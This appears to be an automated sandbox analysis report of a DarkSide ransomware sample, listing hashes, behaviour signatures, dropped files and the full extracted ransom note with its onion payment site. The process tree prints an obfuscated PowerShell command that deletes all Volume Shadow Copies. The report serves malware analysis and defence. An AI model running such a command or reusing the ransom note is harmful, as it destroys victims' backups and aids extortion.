Analysis

  • max time kernel
    120s
  • max time network
    125s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    30-05-2024 01:04

General

  • Target

    a09c5577e3d77448db6dba62bdb99e65e3128774616e20742105fdc31fff336d.exe

  • Size

    30KB

  • MD5

    4b63c4a60469d933cd76a31aae1892ae

  • SHA1

    6d9eda625a918c06007fb58f010e4120490419a3

  • SHA256

    a09c5577e3d77448db6dba62bdb99e65e3128774616e20742105fdc31fff336d

  • SHA512

    06beee2bbc68e082f80e2ff1fb54cb4833c6100308ff6dc737d05170432689dd9e4d8ff37ad831ae0d5170382c0110a5a711b9e8c53074bdcd688de866442131

  • SSDEEP

    768:neIjgezsb2BTkZPM0qf/uR+G9D7H98hWR4rONNxLkyhSccdf:neim2oPM08/uR+c7dkY/fpcd

Malware Config

Extracted

Path

C:\Users\Admin\README.b565854b.TXT

Family

darkside

Ransom Note
----------- [ Welcome to DarkSide ] -------------> What happend? ---------------------------------------------- Your computers and servers are encrypted, backups are deleted. We use strong encryption algorithms, so you cannot decrypt your data. But you can restore everything by purchasing a special program from us - universal decryptor. This program will restore all your network. Follow our instructions below and you will recover all your data. What guarantees? ---------------------------------------------- We value our reputation. If we do not do our work and liabilities, nobody will pay us. This is not in our interests. All our decryption software is perfectly tested and will decrypt your data. We will also provide support in case of problems. We guarantee to decrypt one file for free. Go to the site and contact us. How to get access on website? ---------------------------------------------- Using a TOR browser: 1) Download and install TOR browser from this site: https://torproject.org/ 2) Open our website: http://darksidfqzcuhtk2.onion/OBB5DDMR8RB9DI2RYYF376YGBJAV2J4F2NXFEWPBSXY709MAA0MY7PMBBQJ0HVG3 When you open our website, put the following data in the input form: Key: 5l5BZPnhuDEYAVqJR4MgValoWwML2OjDOtYwubDXeXGefcJDd4otfGdb9pJPrHW7Rt0XqdwabTWl9I5xhiHBsW6mg5BoqR4M2LZ0TI1hN4ifY7RVgRakjxxhhyImncWtgNb8LWtJlhn6cwtDLlsIjq0wAn8s7YsdzgTPPreHXEyFiFH1ozVIpZXV1mO5QXMZu16DNkFcXVIfdw5gPeSYjd3VAa7VlIH8IXgwCuza7YprCeDIOmvRqYK1jBH4s4nn0VyEHnWRndP7jNNUmat6FMhNzeKnLYGbMDRwmZR6iFdFX0Y3lhEWenDamVRchRSE5YwiL9LqTfkrnrswflssAB0SOcodZXRxG5HNItcitj3Za1NzC5fmBpdKN4jV01hMBG98ZEN8HMKeOdVxKtbAZP86K9IfBy8QcNrWLQ2hAeup6DD6KsG8R0Jj8czKTu4MDlGaxQMtPSycA0B6IzpPVV0Tbn9yWIIFH6y4mir71zDWbcPH3p5Hnr80gTnOFHXGzkGfrdy1bjn5H99zniLFFjchV8EEPMtgG2PwKF7NVQ9dTdlMBHWQpGc !!! DANGER !!! DO NOT MODIFY or try to RECOVER any files yourself. We WILL NOT be able to RESTORE them. !!! DANGER !!!
URLs

http://darksidfqzcuhtk2.onion/OBB5DDMR8RB9DI2RYYF376YGBJAV2J4F2NXFEWPBSXY709MAA0MY7PMBBQJ0HVG3

Signatures

  • DarkSide

    Targeted ransomware first seen in August 2020. Operators steal data to use as leverage.

  • Renames multiple (160) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Sets desktop wallpaper using registry 2 TTPs 2 IoCs
  • Modifies Control Panel 1 IoCs
  • Modifies registry class 5 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\a09c5577e3d77448db6dba62bdb99e65e3128774616e20742105fdc31fff336d.exe
    "C:\Users\Admin\AppData\Local\Temp\a09c5577e3d77448db6dba62bdb99e65e3128774616e20742105fdc31fff336d.exe"
    1⤵
    • Sets desktop wallpaper using registry
    • Modifies Control Panel
    • Modifies registry class
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1704
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1164
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:2780

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015

    Filesize

    70KB

    MD5

    49aebf8cbd62d92ac215b2923fb1b9f5

    SHA1

    1723be06719828dda65ad804298d0431f6aff976

    SHA256

    b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

    SHA512

    bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

  • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

    Filesize

    342B

    MD5

    14f24227760ed99bd7c76bd08e0fd579

    SHA1

    a583439ff879aa1954cf7d180a7b21179ec8bc13

    SHA256

    b5312a5cc37b651bdd0f19d335e47f56d8d6badf490345a327935ecb0b53f874

    SHA512

    65871d612004d37d896c93025883f37d40b4490f563d62a42946ce372ce8152977d135767e572013d1fd5ad6b95e89db3a994b6e9801bababf6f929acdd2601f

  • C:\Users\Admin\AppData\Local\Temp\Tar93ED.tmp

    Filesize

    181KB

    MD5

    4ea6026cf93ec6338144661bf1202cd1

    SHA1

    a1dec9044f750ad887935a01430bf49322fbdcb7

    SHA256

    8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

    SHA512

    6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    e42ab2da2668d4e64814da64c57d15ca

    SHA1

    0018e47ad02383d77ef5a01ca8a068f0906cfe73

    SHA256

    458d9ae40ba298203d4fad77f0e13fc34bbf767aebca7673eaeac32127e04969

    SHA512

    2a102bef9d94ca6a0aaba0bed856bc34892c733943c7369140bdcd5c9618494da85ea34795cd886c156163763b622ac7ef102dc7808ba18e7624da7327e2b797

  • C:\Users\Admin\README.b565854b.TXT

    Filesize

    1KB

    MD5

    f418a249405444da33cc73b402a26306

    SHA1

    1a6c493e74036f93f0dae4b65e6c543c213ce418

    SHA256

    b348457b3cd38a91d113b0dfbf5bdf9d830b39f5ab849b126fff027534ef2e09

    SHA512

    b848dd2bb5654aac30d36279af1b9460b36c2df9c8f696d5349a870cd9be8b0aac203623c2025e8b32e646b0558ee27cf72e04db6aee3a2cd548d5c29575efaf

  • memory/1164-49-0x000007FEF4C70000-0x000007FEF560D000-memory.dmp

    Filesize

    9.6MB

  • memory/1164-47-0x0000000002420000-0x0000000002428000-memory.dmp

    Filesize

    32KB

  • memory/1164-48-0x000007FEF4C70000-0x000007FEF560D000-memory.dmp

    Filesize

    9.6MB

  • memory/1164-50-0x000007FEF4C70000-0x000007FEF560D000-memory.dmp

    Filesize

    9.6MB

  • memory/1164-51-0x000007FEF4C70000-0x000007FEF560D000-memory.dmp

    Filesize

    9.6MB

  • memory/1164-52-0x000007FEF4C70000-0x000007FEF560D000-memory.dmp

    Filesize

    9.6MB

  • memory/1164-53-0x000007FEF4C70000-0x000007FEF560D000-memory.dmp

    Filesize

    9.6MB

  • memory/1164-46-0x000000001B180000-0x000000001B462000-memory.dmp

    Filesize

    2.9MB

  • memory/1164-45-0x000007FEF4F2E000-0x000007FEF4F2F000-memory.dmp

    Filesize

    4KB

  • memory/1704-0-0x0000000000110000-0x0000000000125000-memory.dmp

    Filesize

    84KB

  • memory/1704-252-0x00000000000E0000-0x00000000000E4000-memory.dmp

    Filesize

    16KB

  • memory/1704-2-0x00000000000E0000-0x00000000000E4000-memory.dmp

    Filesize

    16KB